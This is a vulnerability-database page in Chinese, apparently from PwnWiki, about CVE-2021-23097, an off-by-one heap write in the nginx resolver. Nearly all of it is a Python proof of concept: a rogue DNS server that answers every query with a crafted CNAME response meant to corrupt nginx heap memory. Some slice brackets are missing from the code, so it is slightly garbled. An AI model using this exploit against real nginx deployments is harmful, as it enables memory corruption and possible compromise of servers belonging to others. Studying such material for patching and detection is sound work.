Loading
0

CVE-2021-23097 Nginx解析器 Off-by-One堆写入漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

影响版本

0.6.18 - 1.20.0

POC

from binascii import hexlify, unhexlify
from socket import AF_INET, SOCK_DGRAM, socket
from struct import unpack

sock = socket(AF_INET, SOCK_DGRAM)
sock.bind(('0.0.0.0', 1053))

while True:
    request, addr = sock.recvfrom(4096)
    print(b'<<< '+hexlify(request))
    ident = request0:2
    # find request
    nullptr = request.find(0x0,12)
    reqname = request12:request.find(0x0,12)+1
    reqtype = requestnullptr+1:nullptr+3
    reqclass = requestnullptr+3:nullptr+5
    print('name: %s, type: %s, class: %s' % (reqname, unpack('>H', reqtype), unpack('>H', reqclass)))
    # CNAME response
    response = request0:2 + \
               unhexlify('''81800001000100000000''') + \
               reqname + reqtype + reqclass + \
               unhexlify('c00c0005000100000e10000b18414141414141414141414141414141414141414141414141c004')
    print(b'>>> '+hexlify(response))
    sock.sendto(bytes(response), addr)

PWNWIK.COM